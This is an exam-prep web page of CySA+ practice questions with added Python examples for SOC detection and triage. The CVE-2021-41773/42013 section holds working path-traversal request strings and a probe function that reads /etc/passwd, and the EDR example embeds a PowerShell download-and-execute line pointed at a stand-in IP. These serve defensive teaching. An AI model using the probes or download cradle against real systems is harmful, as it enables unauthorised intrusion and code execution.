Free CompTIA Cybersecurity Analyst (CySA+) (CS0-003) Practice Questions
Test your knowledge with 30 free exam-style questions
CS0-003 Exam Facts
Questions: maximum of 85
Passing score: 750 (on a scale of 100-900)
Duration: 165 min
Frequently Asked Questions
These 30 sample questions let you experience the exact format, difficulty, and question styles you'll encounter on exam day. Use them to identify knowledge gaps and decide if our full practice exam package is right for your preparation strategy.
Our questions mirror the actual exam format, difficulty level, and topic distribution. Each question includes detailed explanations to help you understand the concepts.
The full package includes 7 complete practice exams with 455+ unique questions, detailed explanations, progress tracking, and lifetime access.
Yes! Our CS0-003 practice questions are regularly updated to reflect the latest exam objectives and question formats. All questions align with the current 2026 exam blueprint.
Sample CS0-003 Practice Questions
Browse all 30 free CompTIA Cybersecurity Analyst (CySA+) practice questions below.
A security analyst is reviewing SIEM alerts and notices multiple failed SSH login attempts from the same IP address to different servers over a 10-minute period. The source IP is from a known datacenter provider. Which of the following threat hunting techniques would be MOST effective to determine if this is part of a larger attack campaign?
- Block the IP address at the firewall and continue monitoring for similar patterns
- Query the SIEM for other activities from the same ASN (Autonomous System Number) and correlate with threat intelligence feeds
- Implement rate limiting on SSH connections from external sources
- Reset passwords for all accounts that received failed login attempts
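The pivot the correct answer describes, written out as an added example (not part of the original question set): find source IPs whose failed SSH logins spread across several hosts inside a 10-minute window, then look for other sources in the same ASN. The sshd lines and the prefix-to-ASN table are constructed for the example; in practice the table is a MaxMind GeoLite2-ASN database or a Team Cymru lookup, and the correlation runs as a SIEM query rather than a script.

```python
import ipaddress
import re
from collections import defaultdict
from datetime import datetime, timedelta

# Constructed sshd lines from several hosts (hostname, UTC timestamp, message); not real data.
LOG_LINES = [
    "web01 2024-05-01T10:00:05Z sshd[1201]: Failed password for root from 203.0.113.7 port 51234 ssh2",
    "web02 2024-05-01T10:01:10Z sshd[1202]: Failed password for invalid user admin from 203.0.113.7 port 51240 ssh2",
    "db01 2024-05-01T10:03:40Z sshd[1203]: Failed password for root from 203.0.113.7 port 51300 ssh2",
    "web01 2024-05-01T10:04:01Z sshd[1204]: Failed password for invalid user test from 203.0.113.7 port 51302 ssh2",
    "web03 2024-05-01T10:06:12Z sshd[1205]: Failed password for root from 203.0.113.99 port 40011 ssh2",
    "db02 2024-05-01T10:07:30Z sshd[1206]: Failed password for root from 203.0.113.99 port 40012 ssh2",
    "web01 2024-05-01T10:20:00Z sshd[1207]: Failed password for root from 198.51.100.5 port 2222 ssh2",
    "web02 2024-05-01T11:30:00Z sshd[1208]: Accepted publickey for deploy from 192.0.2.10 port 5000 ssh2",
]

FAILED_RE = re.compile(
    r"^(?P<host>\S+) (?P<ts>\S+) sshd\[\d+\]: Failed password for (?:invalid user )?(?P<user>\S+) "
    r"from (?P<ip>\d{1,3}(?:\.\d{1,3}){3}) port \d+ ssh2$"
)

# Constructed prefix-to-ASN table standing in for a real IP-to-ASN source.
ASN_TABLE = {
    ipaddress.ip_network("203.0.113.0/24"): (64496, "EXAMPLE-DATACENTER"),
    ipaddress.ip_network("198.51.100.0/24"): (64497, "EXAMPLE-ISP"),
}

def parse_failures(lines):
    """Return (timestamp, host, source_ip, user) for every failed-password line."""
    events = []
    for line in lines:
        m = FAILED_RE.match(line)
        if m:
            ts = datetime.strptime(m["ts"], "%Y-%m-%dT%H:%M:%SZ")
            events.append((ts, m["host"], m["ip"], m["user"]))
    return events

def spraying_sources(events, window=timedelta(minutes=10), min_hosts=2):
    """Source IPs that failed against >= min_hosts distinct hosts inside any window-long span.
    Returns {ip: set_of_hosts}. Spread across hosts is what separates a campaign from one
    misconfigured client hammering a single server."""
    by_ip = defaultdict(list)
    for ts, host, ip, _ in sorted(events):
        by_ip[ip].append((ts, host))
    hits = {}
    for ip, evs in by_ip.items():
        for i, (start, _) in enumerate(evs):
            hosts = {h for t, h in evs[i:] if t - start <= window}
            if len(hosts) >= min_hosts:
                hits[ip] = hosts
                break
    return hits

def asn_of(ip):
    addr = ipaddress.ip_address(ip)
    for net, info in ASN_TABLE.items():
        if addr in net:
            return info
    return None

def pivot_on_asn(events, seed_ip):
    """The hunting pivot: every other source IP in the data that shares the seed's ASN."""
    seed = asn_of(seed_ip)
    if seed is None:
        return set()
    return {ip for _, _, ip, _ in events if ip != seed_ip and asn_of(ip) == seed}

if __name__ == "__main__":
    events = parse_failures(LOG_LINES)
    for ip, hosts in spraying_sources(events).items():
        print(ip, asn_of(ip), sorted(hosts), "same-ASN sources:", sorted(pivot_on_asn(events, ip)))
```

On this constructed data 203.0.113.7 and 203.0.113.99 both spray several hosts and share AS64496, which is the "larger campaign" signal the question is after; 198.51.100.5 hits one host and drops out. The same-ASN list is what you then hand to the threat-intelligence lookup.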
During vulnerability scanning, a security team discovers multiple web servers running Apache 2.4.49 with CVE-2021-41773 (CVSS 7.5), a path traversal flaw that also allows remote code execution when CGI scripts are enabled. However, the vulnerability scanner reports the systems as 'potentially vulnerable' rather than 'vulnerable'. What should the analyst do NEXT to validate this finding?
- Perform manual validation by attempting a safe proof-of-concept path traversal request to confirm the vulnerability is exploitable
- Mark the finding as a false positive and exclude it from future scans
- Change the risk rating to low since the scanner was uncertain about the finding
- Immediately patch all affected servers since the CVSS score is 7.5
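What a "safe proof-of-concept" looks like for this finding, as an added example (not from the original page): the probe reads a file through the traversal instead of executing anything, and the response classifier distinguishes a confirmed read from the 403 you get when the build is affected but the default `Require all denied` on the filesystem root stops it. The `probe` helper sends the requests; `classify_response` is the part that turns a response into a ticket state. Only run `probe` against systems you are authorised to test.

```python
import http.client
import re

# Read-only traversal probes. In 2.4.49 ".%2e" survives path normalisation as "..";
# 2.4.50's incomplete fix is bypassed with double encoding (CVE-2021-42013).
PROBES = [
    ("CVE-2021-41773", "/cgi-bin/.%2e/.%2e/.%2e/.%2e/etc/passwd"),
    ("CVE-2021-41773", "/icons/.%2e/.%2e/.%2e/.%2e/etc/passwd"),
    ("CVE-2021-42013", "/cgi-bin/.%%32%65/.%%32%65/.%%32%65/.%%32%65/etc/passwd"),
]
PASSWD_RE = re.compile(r"^root:[^:]*:0:0:", re.M)

def classify_response(status, body):
    """Turn one probe response into a finding state the ticket can carry."""
    if status == 200 and PASSWD_RE.search(body):
        return "vulnerable"        # traversal confirmed: a file outside DocumentRoot came back
    if status == 403:
        return "blocked"           # build may be affected, but directory access control stops the read
    if status in (400, 404):
        return "not-reproduced"    # path was normalised away or the alias/cgi path does not exist
    return "inconclusive"

def probe(host, port=80, timeout=5):
    """Send every probe to host:port and return (cve, path, status, verdict) per probe."""
    results = []
    for cve, path in PROBES:
        conn = http.client.HTTPConnection(host, port, timeout=timeout)
        try:
            conn.request("GET", path, headers={"Host": host})
            resp = conn.getresponse()
            body = resp.read(4096).decode("utf-8", "replace")
            results.append((cve, path, resp.status, classify_response(resp.status, body)))
        finally:
            conn.close()
    return results
```

A "vulnerable" result upgrades the scanner's finding to confirmed and the server joins the patch-now list; "blocked" means the vulnerable code is present and the server still needs 2.4.51, but the configuration is holding and urgency can be scheduled; "not-reproduced" is the case to push back on the scanner with, not to mark as a false positive without checking the version from the package manager first.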
A cybersecurity analyst is investigating anomalous network traffic and discovers encrypted outbound connections on port 443 from a database server to an IP address in a different country. The server should only communicate with internal application servers. Which combination of actions would BEST help determine if this is a command-and-control (C2) communication? (Select TWO)
- Analyze the TLS certificate used in the connection and check if it's associated with known malicious infrastructure
- Examine the connection timing patterns and beacon intervals for regularity that indicates automated C2 communication
- Immediately block all outbound traffic on port 443 from the database server
- Restore the database server from the most recent backup to remove any potential malware
- Perform SSL/TLS decryption using a man-in-the-middle proxy to inspect the encrypted payload
An organization uses CVSS v3.1 for vulnerability prioritization. A vulnerability scanner identifies CVE-2024-XXXX with the following CVSS vector: CVSS:3.1/AV:N/AC:L/PR:N/UI:N/S:C/C:H/I:H/A:H (Base Score: 10.0). However, the affected web application is only accessible from the internal network behind multiple layers of security controls. How should the security team adjust their remediation prioritization?
- Focus only on the Temporal Score by checking if exploits are publicly available
- Calculate the Environmental Score by setting the Modified Attack Vector to Adjacent (MAV:A) and the Confidentiality, Integrity and Availability Requirements (CR/IR/AR) according to asset criticality
- Maintain the critical priority (10.0) since CVSS base scores should not be modified
- Deprioritize the vulnerability to low since it's not exploitable from the internet
A security operations center (SOC) analyst is investigating an alert from an endpoint detection and response (EDR) tool showing that PowerShell.exe spawned from Excel.exe and executed encoded commands. The user reports opening a spreadsheet received via email. What is the MOST likely attack technique being used?
- Malicious macro executing PowerShell for code execution or payload delivery
- SQL injection attack targeting the user's database credentials
- Distributed denial-of-service (DDoS) attack from the user's workstation
- Man-in-the-middle attack intercepting email communications
During a vulnerability assessment, a scanner reports 147 vulnerabilities across 50 servers. The security team has limited resources and must prioritize remediation. Which of the following approaches would provide the MOST effective prioritization framework?
- Check CISA Known Exploited Vulnerabilities (KEV) catalog and prioritize any CVEs listed there
- Remediate vulnerabilities in order of discovery date, starting with the oldest
- Focus only on vulnerabilities affecting internet-facing systems and ignore internal vulnerabilities
- Prioritize based solely on CVSS base scores, patching all critical (9.0-10.0) vulnerabilities first
- Use a risk-based approach combining CVSS scores, asset criticality, exploit availability, and compensating controls
A threat hunting team is analyzing DNS resolver logs and identifies a workstation making DNS queries for algorithmically-generated domain names (DGAs) at a rate of 50 queries per minute. Most queries result in NXDOMAIN responses. What does this activity MOST likely indicate?
- Malware using a Domain Generation Algorithm (DGA) to locate command-and-control servers
- Normal user browsing behavior with typos in domain names
- A misconfigured DNS server causing recursive query loops
- A DNS tunneling exfiltration attempt
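The two distractors worth separating here are DGA beaconing and DNS tunneling, because both produce a flood of odd-looking names. This added example (not from the original page) profiles each client in a set of constructed resolver records and applies the distinguishing heuristics: a DGA client queries many distinct registered domains that mostly fail to resolve, while a tunneling client queries many long, unique subdomains under one parent domain that always resolves. The records are generated from a fixed seed so the run is repeatable; the thresholds are starting points, not tuned values.

```python
import math
import random
import statistics
from collections import Counter, defaultdict

# Constructed DNS resolver log records (client_ip, qname, qtype, rcode); none are real observations.
_rng = random.Random(7)

def _label(n, alphabet="abcdefghijklmnopqrstuvwxyz0123456789"):
    return "".join(_rng.choice(alphabet) for _ in range(n))

RECORDS = []
# client A, DGA-style: ~50 distinct pseudo-random registered domains, almost all NXDOMAIN
for _ in range(50):
    RECORDS.append(("10.1.2.3", _label(12) + _rng.choice([".com", ".net", ".info"]), "A", "NXDOMAIN"))
RECORDS.append(("10.1.2.3", _label(12) + ".com", "A", "NOERROR"))      # the one the attacker registered
# client B, tunneling-style: long hex subdomains under ONE parent that always resolves
for _ in range(40):
    RECORDS.append(("10.1.2.4", _label(48, "0123456789abcdef") + ".t.cdn-example.net", "TXT", "NOERROR"))
# client C, ordinary browsing with a repeated typo
for name in ["www.example.com", "mail.example.org", "cdn.example.net", "www.exmaple.com"] * 5:
    RECORDS.append(("10.1.2.5", name, "A", "NXDOMAIN" if "exmaple" in name else "NOERROR"))

def shannon_entropy(s):
    if not s:
        return 0.0
    counts = Counter(s)
    return -sum(c / len(s) * math.log2(c / len(s)) for c in counts.values())

def registered_domain(qname):
    # Naive last-two-labels split; production code should use the Public Suffix List (co.uk, ...).
    return ".".join(qname.rstrip(".").split(".")[-2:])

def profile_clients(records):
    stats = defaultdict(lambda: {"queries": 0, "nxdomain": 0, "registered": set(),
                                 "per_parent": defaultdict(set), "label_len": [], "entropy": []})
    for client, qname, _qtype, rcode in records:
        s = stats[client]
        s["queries"] += 1
        s["nxdomain"] += rcode == "NXDOMAIN"
        parent = registered_domain(qname)
        s["registered"].add(parent)
        s["per_parent"][parent].add(qname)
        first = qname.split(".")[0]
        s["label_len"].append(len(first))
        s["entropy"].append(shannon_entropy(first))
    return stats

def classify(s):
    """DGA: many distinct parents, mostly NXDOMAIN. Tunneling: one parent, many long unique
    subdomains, answers succeed. Everything else is left for the analyst."""
    nx_ratio = s["nxdomain"] / s["queries"]
    max_subs = max(len(v) for v in s["per_parent"].values())
    if nx_ratio >= 0.8 and len(s["registered"]) >= 10:
        return "dga-like"
    if max_subs >= 10 and nx_ratio < 0.2 and statistics.mean(s["label_len"]) >= 30:
        return "tunneling-like"
    return "normal"

def classify_all(records):
    return {client: classify(s) for client, s in profile_clients(records).items()}
```

The query type is carried but not used by the rule; in real data TXT and NULL queries from a workstation are a further tunneling indicator, and the per-label entropy collected here is what you would plot to spot DGA families that use dictionary words instead of random characters (those defeat the entropy check but not the NXDOMAIN ratio).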
An organization's vulnerability management program uses automated scanning, but the security team wants to improve accuracy and reduce false positives. A recent scan of a Linux server running Apache reported 23 vulnerabilities, but manual verification found only 8 were actually exploitable. Which actions would BEST improve scan accuracy? (Select TWO)
- Switch to a different vulnerability scanner to get better results
- Enable credentialed scanning with appropriate read-only service accounts to allow accurate version detection
- Disable all vulnerability checks rated below CVSS 7.0 to focus on critical issues
- Reduce scan frequency from weekly to monthly to allow more time for manual validation
- Configure the scanner to perform safe exploit checks that validate actual exploitability
A security analyst is reviewing logs and discovers that an attacker successfully exploited a known vulnerability on a web server that was identified in a vulnerability scan 45 days ago but not yet patched. The vulnerability had a CVSS score of 8.1. Which phase of the vulnerability management lifecycle FAILED in this scenario?
- Detection - the vulnerability scanner failed to identify the vulnerability
- Assessment - the CVSS score was incorrectly calculated
- Remediation - the identified vulnerability was not patched in a timely manner
- Verification - the team failed to confirm the vulnerability existed
During threat hunting, an analyst uses the MITRE ATT&CK framework to search for evidence of persistence mechanisms. They discover a scheduled task on a Windows server configured to run 'powershell.exe -WindowStyle Hidden -EncodedCommand <base64_string>' every 12 hours. The task was created by a service account three days ago. What ATT&CK technique is MOST likely being used?
- T1486 - Data Encrypted for Impact
- T1071.001 - Application Layer Protocol: Web Protocols
- T1053.005 - Scheduled Task/Job: Scheduled Task
- T1110.001 - Brute Force: Password Guessing
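This added example (not part of the original page) serves both the Excel-spawns-PowerShell alert above and this scheduled-task finding: it triages constructed EDR process-creation events by parent/child relationship and decodes the `-EncodedCommand` argument, which is base64 over UTF-16LE text, not plain base64. The event field names and the stage-one payload are this example's assumptions, and the ATT&CK mapping is the one a hunter would attach to each pattern (phishing attachment, user execution and PowerShell for the Office case; Scheduled Task for the task-scheduler case; Command Obfuscation for the encoding in both).

```python
import base64
import re

OFFICE_PARENTS = {"excel.exe", "winword.exe", "powerpnt.exe", "outlook.exe"}
SCRIPT_HOSTS = {"powershell.exe", "pwsh.exe", "cmd.exe", "wscript.exe", "cscript.exe", "mshta.exe"}

# powershell.exe accepts any unambiguous prefix of -EncodedCommand (-e, -en, -enc, ...) and -ec.
FLAG_RE = re.compile(r"(?i)(?:^|\s)[-/](e[a-z]*)\s+([A-Za-z0-9+/=]{8,})")

def decode_encoded_command(command_line):
    """Return the plaintext of a -EncodedCommand argument (base64 of UTF-16LE), or None."""
    for flag, blob in FLAG_RE.findall(command_line):
        f = flag.lower()
        if f == "ec" or "encodedcommand".startswith(f):
            try:
                return base64.b64decode(blob, validate=True).decode("utf-16-le")
            except (ValueError, UnicodeDecodeError):
                return None
    return None

# Constructed stage-one payload, encoded exactly as 'powershell -EncodedCommand' expects it.
PAYLOAD = "IEX (New-Object Net.WebClient).DownloadString('http://203.0.113.5/stage.ps1')"
ENCODED = base64.b64encode(PAYLOAD.encode("utf-16-le")).decode("ascii")

# Constructed EDR process-creation events; the field names are assumptions, not a vendor schema.
EVENTS = [
    {"host": "WS-0142", "parent_image": r"C:\Program Files\Microsoft Office\root\Office16\EXCEL.EXE",
     "parent_command_line": '"EXCEL.EXE" "C:\\Users\\jdoe\\Downloads\\Invoice_Q2.xlsm"',
     "image": r"C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe",
     "command_line": f"powershell.exe -NoP -W Hidden -Enc {ENCODED}"},
    {"host": "SRV-APP01", "parent_image": r"C:\Windows\System32\svchost.exe",
     "parent_command_line": "svchost.exe -k netsvcs -p -s Schedule",   # the Task Scheduler service host
     "image": r"C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe",
     "command_line": f"powershell.exe -WindowStyle Hidden -EncodedCommand {ENCODED}"},
    {"host": "WS-0142", "parent_image": r"C:\Windows\explorer.exe",
     "parent_command_line": "explorer.exe",
     "image": r"C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe",
     "command_line": r"powershell.exe -ExecutionPolicy Bypass -File C:\scripts\inventory.ps1"},
]

def _basename(path):
    return path.replace("/", "\\").rsplit("\\", 1)[-1].lower()

def triage(event):
    """Map one process event to the ATT&CK techniques its parent, child and arguments suggest."""
    parent, child = _basename(event["parent_image"]), _basename(event["image"])
    techniques = []
    if parent in OFFICE_PARENTS and child in SCRIPT_HOSTS:
        techniques += ["T1566.001", "T1204.002", "T1059.001"]   # attachment -> user execution -> PowerShell
    if parent == "svchost.exe" and "schedule" in event.get("parent_command_line", "").lower() \
            and child in SCRIPT_HOSTS:
        techniques += ["T1053.005", "T1059.001"]                # Task Scheduler launched a script host
    decoded = decode_encoded_command(event["command_line"])
    if decoded is not None:
        techniques.append("T1027.010")                          # command obfuscation via encoding
    return {"host": event["host"], "parent": parent, "child": child,
            "techniques": techniques, "decoded": decoded}

if __name__ == "__main__":
    for ev in EVENTS:
        print(triage(ev))
```

The third event is the benign control: an administrator's script launched from the desktop decodes to nothing and maps to nothing. For the scheduled task itself, the parent-process view only tells you the task ran; the creation three days ago by a service account is in Security event 4698 or the Microsoft-Windows-TaskScheduler/Operational log, which is where the hunt for other tasks created by that account goes next.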
A vulnerability scan reveals that several Windows servers are missing a critical security update (CVSS 9.8) released 60 days ago. The IT team explains that they cannot patch these servers because they run legacy ERP software certified only for specific OS configurations, and patching would violate vendor support agreements. What should the security team recommend?
- Disable the vulnerable service until the servers can be patched
- Accept the risk and document the decision with business justification
- Implement compensating controls such as network segmentation, strict access controls, and enhanced monitoring while working on a long-term solution
- Force immediate patching regardless of vendor support implications
A SOC analyst is investigating a SIEM alert for multiple failed login attempts followed by a successful login to a privileged account from an unusual geographic location. Which of the following data sources would provide the BEST additional context for this investigation? (Select TWO)
- Vulnerability scan results from the authentication server
- Network bandwidth utilization graphs for the past 24 hours
- Firewall logs showing all traffic allowed through the perimeter
- Threat intelligence feed showing if the source IP is associated with known malicious activity
- User and Entity Behavior Analytics (UEBA) baseline showing normal login patterns for this account
An organization is implementing a vulnerability disclosure program and needs to prioritize remediation of reported vulnerabilities. A security researcher submits a report about a stored XSS vulnerability in a customer-facing web application. The researcher provides a working proof-of-concept. How should this vulnerability be prioritized?
- Medium priority and request the researcher submit through a different channel
- Critical priority and immediately take the application offline until patched
- High priority because it's a stored XSS with a working exploit in a customer-facing application
- Low priority since XSS vulnerabilities only affect the client-side browser
A threat hunting team is analyzing proxy logs and discovers periodic HTTPS connections to pastebin.com from a production server every 6 hours. The server hosts an internal inventory management system and should not access external websites. What is the MOST likely purpose of this activity if the server is compromised?
- The attacker is using Pastebin for command-and-control (C2) dead drop communication
- The inventory management software is checking for license validation
- A software developer is backing up source code to Pastebin
- An automated system update process downloading patches from Pastebin
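Two questions on this page turn on the same check: the database server's outbound 443 connections above, where "beacon intervals for regularity" is one of the two correct answers, and this server's Pastebin connection every 6 hours. This added example (not from the original page) scores the regularity of connection timing with the coefficient of variation of the inter-connection gaps, run over three constructed timestamp series: the database server's connections, the inventory server's Pastebin connections, and an interactive user's browsing for contrast.

```python
import statistics
from datetime import datetime

def _ts(*items):
    return [datetime.strptime(s, "%Y-%m-%d %H:%M:%S") for s in items]

# Constructed connection start times for three src->dst pairs; not real data.
DB_TO_FOREIGN_443 = _ts("2024-05-01 12:00:00", "2024-05-01 12:05:03", "2024-05-01 12:09:58",
                        "2024-05-01 12:15:01", "2024-05-01 12:20:02", "2024-05-01 12:24:57",
                        "2024-05-01 12:30:00")
INVENTORY_TO_PASTEBIN = _ts("2024-05-01 00:00:00", "2024-05-01 06:00:00", "2024-05-01 12:00:00",
                            "2024-05-01 18:00:00", "2024-05-02 00:00:00")
USER_BROWSING = _ts("2024-05-01 09:00:00", "2024-05-01 09:00:12", "2024-05-01 09:03:45",
                    "2024-05-01 09:04:02", "2024-05-01 09:31:10", "2024-05-01 09:31:11",
                    "2024-05-01 10:15:00")

def intervals(timestamps):
    """Seconds between consecutive connections, in time order."""
    ts = sorted(timestamps)
    return [(b - a).total_seconds() for a, b in zip(ts, ts[1:])]

def beacon_profile(timestamps, min_intervals=4, max_cv=0.2):
    """Score how clock-like the spacing is. cv = stdev/mean of the gaps: 0 is a perfect
    clock, malware with configured jitter (commonly 10-30%) stays well below 0.5, and
    human-driven traffic is usually above 1. Too few samples gives no verdict."""
    gaps = intervals(timestamps)
    if len(gaps) < min_intervals:
        return {"intervals": len(gaps), "period_s": None, "cv": None, "beacon_like": False}
    mean = statistics.mean(gaps)
    cv = statistics.stdev(gaps) / mean if mean else float("inf")
    return {"intervals": len(gaps), "period_s": round(mean), "cv": round(cv, 3),
            "beacon_like": cv <= max_cv}

if __name__ == "__main__":
    for name, series in [("db->foreign:443", DB_TO_FOREIGN_443),
                         ("inventory->pastebin", INVENTORY_TO_PASTEBIN),
                         ("user browsing", USER_BROWSING)]:
        print(name, beacon_profile(series))
```

Regularity alone is not a verdict: NTP, monitoring agents and update checks beacon too. It is the combination that matters, a clock-like period from a host that has no business reason to talk to that destination, which is why the other correct answer for the database server pairs this with the TLS certificate and destination reputation check. Note that a 6-hour period needs at least a day of logs before this function will say anything at all.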
During a vulnerability assessment, multiple findings show the same vulnerability across different systems but with varying CVSS scores due to different configurations and network locations. Which of the following CVSS metric groups accounts for these differences?
- Base Metrics - representing the intrinsic characteristics of the vulnerability
- Environmental Metrics - representing characteristics unique to the organization's environment
- Temporal Metrics - representing characteristics that change over time
- Supplemental Metrics - providing additional context beyond the base score
During an active ransomware incident, the incident response team has successfully isolated affected systems. What should be the NEXT step according to the incident response lifecycle?
- Conduct detailed analysis to understand the attack scope, entry point, persistence mechanisms, and data impact before eradication
- Contact law enforcement and wait for their investigation before proceeding
- Begin eradication by removing malware from isolated systems and restoring from clean backups
- Immediately restore all systems from backups to minimize downtime
A security analyst is preparing an incident response report for executive leadership following a data breach. Which of the following elements should be included in the executive summary? (Select TWO)
- Business impact including number of affected customers, potential regulatory fines, and estimated financial costs
- Raw log files showing the attacker's network activity
- Complete list of all IP addresses, domains, and file hashes associated with the attack
- High-level timeline of the incident from initial compromise to detection and containment
- Detailed technical analysis of the malware's code structure and obfuscation techniques
During forensic analysis of a compromised Linux server, an analyst needs to collect volatile memory data before shutting down the system. Which of the following is the MOST important reason for prioritizing memory collection?
- Legal requirements mandate memory collection before disk imaging
- Memory forensics are easier to analyze than disk forensics
- Memory contains running processes, network connections, encryption keys, and other data that will be lost when the system powers off
- Memory collection is faster than disk imaging, reducing total evidence collection time
A company's SOC manager needs to define Key Performance Indicators (KPIs) for measuring the effectiveness of their incident response program. Which of the following metrics would be MOST valuable for this purpose? (Select TWO)
- Mean Time to Detect (MTTD) - average time from initial compromise to detection
- Number of security tools deployed in the environment
- Percentage of incidents that result in executive notification
- Total number of security alerts generated by all systems
- Mean Time to Respond (MTTR) - average time from detection to containment
An organization experiences a security incident where an attacker gained access through a compromised VPN account. During the eradication phase, which of the following actions should be prioritized to prevent reinfection?
- Install endpoint protection software on all systems
- Reset the compromised user's password and resume normal operations
- Disable the VPN service until the investigation is complete
- Force password resets for all VPN users, revoke active sessions, review VPN logs for other compromised accounts, remove any persistence mechanisms, and implement MFA if not already present
A cybersecurity analyst needs to communicate vulnerability remediation priorities to the IT operations team who will perform the patching. The team has limited maintenance windows and needs clear guidance. What information should be prioritized in this communication?
- A list of all CVEs with CVSS scores sorted from highest to lowest
- Compliance audit findings with references to specific regulatory requirements
- Complete CVE descriptions and academic research papers about exploitation techniques
- Risk-ranked list of systems/vulnerabilities with business justification, exploitation likelihood (CISA KEV, public exploits), affected asset criticality, and recommended patch order
During incident recovery, a company is restoring systems from backups after a ransomware attack. Before bringing systems back online, which validation step is MOST critical to prevent reinfection?
- Restore to new hardware to ensure clean environment
- Test restored systems in an isolated network before production
- Scan backup files with antivirus before restoration
- Verify backups are from before the initial compromise date identified during investigation
A security team is conducting a tabletop exercise to test their incident response plan. During the exercise, they discover that the contact information for the cyber insurance provider and legal counsel is outdated. What incident response plan component needs updating?
- Technical playbooks for malware analysis
- Chain of custody documentation templates
- Incident classification criteria
- Communication plan and stakeholder contact list
An analyst is reporting monthly security metrics to the CISO. Last month showed 5,000 security alerts with 150 incidents (3% incident rate). This month shows 3,000 alerts with 120 incidents (4% incident rate). How should this trend be interpreted?
- Detection quality has improved with better alert fidelity (higher true positive rate) and reduced alert volume, though incident count remained similar
- The SOC is missing more threats because alert volume decreased
- Security posture has degraded because there are more incidents per alert
- No meaningful conclusion can be drawn from this data
During the containment phase of a security incident involving a compromised web application, which of the following actions represents SHORT-TERM containment versus LONG-TERM containment?
- Short-term: Collecting forensic evidence. Long-term: Improving logging capabilities
- Short-term: Notifying stakeholders. Long-term: Conducting post-incident review
- Short-term: Installing security patches. Long-term: Monitoring for similar attacks
- Short-term: Taking the web application completely offline. Long-term: Implementing a Web Application Firewall (WAF) rule to block the specific attack while keeping the application available
A company suffered a data breach affecting 50,000 customers' personally identifiable information (PII). When preparing the incident report for regulatory notification (GDPR, state breach notification laws), which information is MOST critical to include? (Select TWO)
- Names and resumes of the incident response team members
- Detailed CVE numbers of all vulnerabilities on the affected systems
- IP addresses and threat actor attribution details
- The nature of the personal data compromised (names, SSN, financial data, health information, etc.)
- The approximate number of affected individuals and data records
During forensic investigation of a compromised system, an analyst discovers that the attacker cleared Windows Event Logs to hide their activities. Which of the following alternative data sources might still contain evidence of the attack? (Select TWO)
- Prefetch files showing recently executed programs including attacker tools
- Temporary internet files from the user's web browser
- Recycle Bin contents on the compromised system
- SIEM or centralized logging system if log forwarding was configured before the attack
- The original installation media used to deploy the operating system
A security manager needs to justify additional budget for security tools to executives who are concerned about costs. Which approach would be MOST effective for communicating the business value?
- Explain that competitors have already implemented these security tools
- Present technical specifications and feature comparisons of different security products
- Cite recent news articles about cyber attacks affecting other companies
- Frame security investment in business terms: potential breach costs (downtime, legal, reputation), risk reduction quantified financially, compliance requirements, and ROI from automation/efficiency gains
An incident response team is conducting root cause analysis after containing a phishing attack that led to credential compromise. Which analysis technique would BEST identify the underlying systemic issues that allowed the attack to succeed?
- Document the phishing email's technical indicators and update email filtering rules
- Create a timeline of the attacker's actions after initial compromise
- 5 Whys analysis to trace the incident back through multiple causal layers to systemic root causes
- Disciplinary action against the user who clicked the phishing link
A company's incident response plan requires different stakeholders to be notified based on incident severity. A critical severity incident (SEV-1) affecting customer data has occurred. Which stakeholders should be notified immediately according to best practices? (Select TWO)
- Facilities management to restrict physical building access
- Social media team to post public updates about the incident
- Executive leadership (CEO, CISO) for business impact decisions and external communications authorization
- All company employees to raise security awareness
- Legal counsel for regulatory compliance, breach notification requirements, and liability assessment